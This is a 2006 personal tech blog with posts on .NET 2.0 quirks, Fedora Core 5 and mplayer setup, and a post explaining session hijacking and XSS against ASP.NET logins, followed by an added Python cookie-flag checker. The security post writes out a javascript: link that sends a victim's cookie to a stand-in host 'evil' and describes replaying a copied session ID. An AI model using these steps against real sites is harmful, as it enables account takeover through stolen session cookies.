03.29.06

Weird .NET 2.0

Posted in Programming at by chenty

For the past two weeks, I continued working on the directory/search engine project. It was nothing new really, but I found two interesting things about .NET 2.0 and Visual Web Developer 2005 that I want to blog about.

1. “\” or “/”:
In HTML, we would like to use “/” in URLs. I was using this for all my web applications. However, since I started using Visual Web Developer 2005 to develop .NET 2.0 applications, I noticed that there were always errors complaining that the path for user web controls could not be found. I did not pay much attention until I finally found it annoying to see these red underlines all the time. Therefore, I went on MSDN and tried to find out how other people define Prefix and Tag for user web controls. It looked like I was doing the right thing, so why the hell did the stupid Visual Web Developer compiler keep complaining?

A couple of days ago, I found some sample code, and in that sample code the path was in the format “~\controls\abc.ascx” instead of “/controls/abc.ascx”. I quickly gave it a try on my applications. To my surprise, it works. Now the compiler can compile my application. This only applies to the VWD compiler. If you still love to use “/”, that is perfectly fine. I don’t have any difficulty running my applications either way.

2. aspnet_client:
We must include this folder in our ASP.NET 1.1 applications, otherwise the server will complain when we use server-side forms. Therefore, when I upgraded some of my legacy code from 1.1 to 2.0, I still kept that folder.

My problem was that I kept getting an error about missing assemblies. I could not find the exact error messages, but it was a page complaining that some dynamic assemblies could not be found. This error shows up randomly, especially when I use a lot of user web controls. Today, after I modified my web application, this error appeared again after I uploaded the file. I wondered why this happens after uploading. I decided to delete unused folders, and accidentally deleted the aspnet_client folder.

Interestingly, after I removed the aspnet_client folder, the problem was solved. Now the server can run the application flawlessly…

Conclusion: Oh, Microsoft!

03.19.06

Fedora Core 5 releases tomorrow!

Posted in Programming at by chenty

Can’t wait to try it. I hope it can solve many problems I had in FC5T3. I still couldn’t get my Flash Player working. I hope the final version can fix it.

03.14.06

Building secure login for ASP.NET against various attacks (session poisoning, XSS, etc) - Part 1

Posted in Programming at by chenty

This article discusses several security issues related to ASP.NET sessions that arise while building a user login feature. It addresses several attacks such as session poisoning, XSS, etc. I assume readers have some experience with building user accounts with ASP.NET. This is not a tutorial on how to build user account functions with ASP.NET.

1. The difference between cookies and ASP.NET sessions.
HTTP is stateless, which means the server does not care who is sending an HTTP request or from where. Therefore, websites use cookies to track and record user activities and identities between clients and servers. I assume readers are quite knowledgeable about cookies. If not, here is a good article:

http://en.wikipedia.org/wiki/Http_cookie

Cookies are controversial mainly because they store user information on the client side. For example, if a website uses cookies to store the user name and password for authentication, they are visible to hackers who have access to the client’s file system. ASP.NET sessions (I will use “sessions” for short) serve a similar role to cookies: they store information to track clients. However, sessions are not stored on the client side but on the server. Sessions use a session ID to communicate between clients and servers to identify clients. This session ID is stored as a cookie on the client side. Therefore, a hacker who has access to the client computer cannot find out the user’s user name and password by examining cookie data.

2. So sessions are secure?
Well, sessions are helpful for securing the user name and password, but they are vulnerable to the “session poisoning attack”, which is quite similar to “cookie poisoning”. You can find information on “cookie poisoning” in the same article I gave above. In “cookie poisoning”, hackers modify cookies and send them back to the server to pretend to be a legitimate user.

For example, a website uses cookie [“userID”] to identify users. After a user logs in, the website assigns the userID to cookie [“userID”] and stores it on the client. In future communication, the website checks whether cookie [“userID”] has a value. If cookie [“userID”] is not empty, then the server knows the user is logged in. This sounds quite logical, but what happens if a hacker modifies the cookie [“userID”] value on his client? Then he can BE ANY USER on that website! This may sound hard to achieve, but it really is not. Using tools such as Minibrowser, you can easily modify the cookie values of the website you are currently browsing, and then refresh the request.

A hacker can do exactly the same thing to sessions. If you log in to a website with Minibrowser and examine the cookies, you will see the cookie in this format:

ASP.NET_SessionId=jga11j55xc2wud25vgvqt0aw;path=/;HttpOnly

Now, copy this string, open Minibrowser on another computer, go to the same website, open “cookies”, paste the above string, and press “Get”. Wow, you are already logged in as the user you previously logged in as on the other computer!!

You may now ask the question: but how can a hacker get access to my ASP.NET_SessionId? The good news is that this session ID is random, it expires in a short time (20 minutes by default), and you will be issued a different session ID next time. This is much better than storing user information in cookies. However, the bad news is that hackers can still get your session ID in certain ways without your knowledge. I will describe two ways here:

(1) Packet Sniffing: Hackers capture packets between client and server. Because HTTP is in ASCII format without encryption, a hacker can easily read your session ID. Here is what they can read in your HTTP request:

GET /homepage.aspx HTTP/1.0
Accept: image/gif, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)
Host: www.vulnerable.com
Cookie: ASP.NET_SessionId=jga11j55xc2wud25vgvqt0aw

See the last line? That is your session ID. The ASP.NET server uses the same session ID to identify you until you close your browser. Therefore, if the hacker gets the session ID from your HTTP message, he can use the “session poisoning” attack to act as you.

Prevention: Use SSL for all communication; then your HTTP messages are no longer visible to hackers.

(2) Cross-site scripting (XSS): Packet sniffing may be too hardcore for some amateur hackers, but XSS is much easier to employ. Even worse, SSL does not protect you at all from an XSS attack. To understand XSS, open a website in your favorite “Firefox” browser. I picked Firefox, because we all know “IE” sucks and “Firefox” means secure! Now type the following in the address bar:

Javascript:alert("My Session ID is: " + document.cookie)

Magic! Now I have just displayed your session ID. Well, it may not surprise you that much because you just saw the same information in Minibrowser. However, what happens if I send you a link such as:

Javascript:document.location.replace('http://evil/submit_session.aspx?site='+document.location+'&session='+document.cookie)

Can you tell what the above address does? It submits your URL and session information to that website “evil”!

Prevention: IE 6.0+ hides the session ID from document.cookie. Therefore, the above code will not work. This is quite ironic when people always think Firefox is more secure. It is (unless Microsoft releases a new version of IE that disables ActiveX), but I think for securing the session ID, IE wins the battle.
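
An added example (not part of the original post): a short Python check that reads a server's Set-Cookie headers and reports whether the ASP.NET_SessionId cookie carries the Secure and HttpOnly attributes, which correspond to the two preventions above (SSL-only transport, and hiding the cookie from document.cookie). The function names and the sample headers are constructed for illustration; only the first sample is the cookie string quoted in the article.

```python
# Added example: audit Set-Cookie headers for the two session-cookie
# protections discussed above. Helper names are hypothetical.
SESSION_COOKIE = "ASP.NET_SessionId"  # cookie name shown in the article


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    if not parts:
        return "", "", {}
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()  # attribute names are case-insensitive
    return name.strip(), value.strip(), attrs


def audit_session_cookie(set_cookie_headers, cookie_name=SESSION_COOKIE):
    """Return a list of findings; an empty list means both flags are present."""
    findings = []
    seen = False
    for header in set_cookie_headers:
        name, _, attrs = parse_set_cookie(header)
        if name != cookie_name:
            continue
        seen = True
        if "secure" not in attrs:
            findings.append("missing Secure: cookie is also sent over plain HTTP and can be sniffed")
        if "httponly" not in attrs:
            findings.append("missing HttpOnly: cookie is readable through document.cookie")
    if not seen:
        findings.append("cookie not set in these headers")
    return findings


# Constructed sample headers; "article" is the cookie string from the post.
SAMPLES = {
    "article": ["ASP.NET_SessionId=jga11j55xc2wud25vgvqt0aw;path=/;HttpOnly"],
    "bare": ["theme=dark; path=/", "ASP.NET_SessionId=jga11j55xc2wud25vgvqt0aw; path=/"],
    "hardened": ["ASP.NET_SessionId=jga11j55xc2wud25vgvqt0aw; path=/; secure; HttpOnly"],
}

if __name__ == "__main__":
    for label, headers in SAMPLES.items():
        print(label, audit_session_cookie(headers) or "ok")
```

The cookie as quoted in the article already has HttpOnly but not Secure, so it is hidden from script in browsers that honor the flag yet still travels in clear text over plain HTTP.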

(To be continued)

03.08.06

Toronto Downtown Full Wifi Coverage

Posted in Information Technology (IT) at by chenty

100% wifi coverage for Downtown Toronto! Hurray!
Here is the news link: http://www.ctv.ca/servlet/ArticleNews/story/CTVNews/20060307/wifi_toronto_060307/20060307?hub=Canada

BUT

It comes to my mind right away: hey, how about security? I still remember how easily you can crack WEP, and how easily a hacker can get into these businessmen’s computers in the same hotspot. And now, there will be 100% coverage for the whole city under one operation.

All the emerging wifi security technology might be the answer, but will Toronto Hydro do the right thing? It will be interesting to watch how this story develops. :-)

03.07.06

Install Mplayer on Fedora Core 5 Test 3

Posted in Programming at by chenty

In my previous post today, I said I had a problem installing mplayer on FC5 T3. The problem was: when I install from rpm or source, it says XFree86 is required as a dependency. FC5 uses X.org instead of XFree86. I tried to install XFree86, but it totally crashed my X-window. After hours of trying, I finally installed mplayer successfully. Here is how I did it:

Instead of using rpm -Uvh, I used yum. You will need Grey Sector Repository. You can find info on:
http://rpm.greysector.net/mplayer/yum.html
http://rpm.greysector.net/yum.html

I modified yum.conf and imported the PGP key. However, I needed to change the script in yum.conf a little bit. There is a variable $releasever. If you are on FC5 T3, this value will be 4.92. There is no such directory. Therefore, I changed $releasever to “4”, so yum will install the package for FC4. Here is my modified script in /etc/yum.conf:

[greysector]
name=Grey Sector RPMs for Fedora Core 4 - $basearch
baseurl=http://rpm.greysector.net/yum/4/$basearch/
#mirrorlist=http://rpm.greysector.net/yum/mirrorlist-$releasever
gpgkey=http://rpm.greysector.net/greysector-pubkey.txt
enabled=1

[greysector-all]
name=Grey Sector RPMs for all Fedora Core releases - $basearch
baseurl=http://rpm.greysector.net/yum/all/$basearch/
#mirrorlist=http://rpm.greysector.net/yum/mirrorlist-all
gpgkey=http://rpm.greysector.net/greysector-pubkey.txt
enabled=1

I have tried this method on my computer and it works perfectly!
After I installed mplayer, I found there was no sound. Then I figured this is because I have 2 sound cards installed, and the first sound device is the one that doesn’t work. I have set the second device as default, but mplayer didn’t recognize it. The solution is to go to preferences -> audio -> ALSA 0.9.x config. Change “driver default” to “default”. Now I am enjoying my MP3s. :-)

=====================================

Too bad I still can’t make my Flash Player display fonts… I said it doesn’t display Chinese, but it actually doesn’t display any text in menus and dialogs in Flash Player at the moment. FC5 moved the locations for fonts, and I read that Flash Player for Linux hard-codes the location of fonts…. Therefore, it doesn’t find fonts for display. How dumb! I hope I can find a solution soon.

03.06.06

Just some personal update + some notes on Fedora Core 5

Posted in Programming, Life at by chenty

Life in the past two weeks was quite boring. I didn’t find anything worthwhile that I want to blog about. This may be caused by my recent bad experience. I am still in trouble with my traffic tickets and have to pay big money for tuning up my car for the road and getting car insurance. Moreover, the graduate school application isn’t going well. No professors that I wrote to have replied to me. :-( It seems that I will probably end up in the Commerce undergraduate program instead of Engineering grad school. However, I don’t think this situation will knock me down. In contrast, I feel a lot of energy to conduct research on my own now. I have gathered several computers in the basement, and I may start a small lab to do some work on distributed systems and operating systems. :-) I believe I am a born fighter.

I have spent a lot of time playing with the new Fedora Core test release (FC5 Test3) and I am really impressed by all the improvements. I have been using Redhat Linux since RH7, so my Linux experience isn’t long compared to these crazy script kids :-) , but I have really seen the improvement with each major Fedora release. The graphics for both GNOME and KDE in FC5 are very good (but honestly I think Windows Vista still beats Fedora), and the bundled packages are quite stable now. OpenOffice, Firefox, Thunderbird, GIMP, GAIM and some other small apps can pretty much fit all my needs. I like FC5 in general, even though it cannot replace my Windows XP Pro.

“Linux is created for hackers by hackers”, so no matter how good it is, it is not for end users. Even though FC5 is quite stable and provides a lot of apps and features, I have still had some problems in the past few days:

1. My new sound card, Creative Audigy SE, which uses ca0106 chipset, isn’t supported by ALSA 1.0.10 (current stable release). I think the card can work with 1.0.11rc2 or later, so I am trying to recompile the kernel with 1.0.11rc3. If this fails, I guess I have to wait for 1.0.11 to be released. :-( For now, I am using an old Yamaha sound card that is at least 6 or 7 years old. :-)

2. I can’t install mplayer in FC5 because the dependency check failed due to missing XFree86… Since FC2, XFree86 has been replaced by X.org, but I had no problem installing mplayer before (it was fine with FC4). I tried to install XFree86 4.5.0, but I failed miserably and totally screwed up the X-window system… I had to reinstall FC5 twice. Anyway, I am not gonna give up, and I will keep trying. Too bad I haven’t found any thread on this issue in forums yet.

3. Because I don’t have mplayer, I am using RealPlayer 10 right now. In plain language, it sucks. It cannot play .rm files properly. It runs like my computer has a Pentium II processor… no idea why…

4. My Flash plug-in doesn’t display Chinese anymore. It did before, but I am not sure why it is not working anymore…

This is not a Linux complaint post, because these are not problems at all for skilled Linux users. So don’t flame me or anything. I love Linux because it creates a lot of problems, and after nights and nights of research, I solve the problems. This is a great way to learn new skills, and maybe this is why all the kiddos who use Linux bash Microsoft all the time. :-)

================================

I felt my above post is totally useless, so I will contribute a good link at the end:

http://www.mjmwired.net/resources/mjm-fedora-fc5.html

This is a “Personal Fedora Core 5 Installation Guide” by Mauriat Miranda. It addresses many problems that people may encounter during installation and setup of FC5. (Too bad it does not address any of the problems that I had.)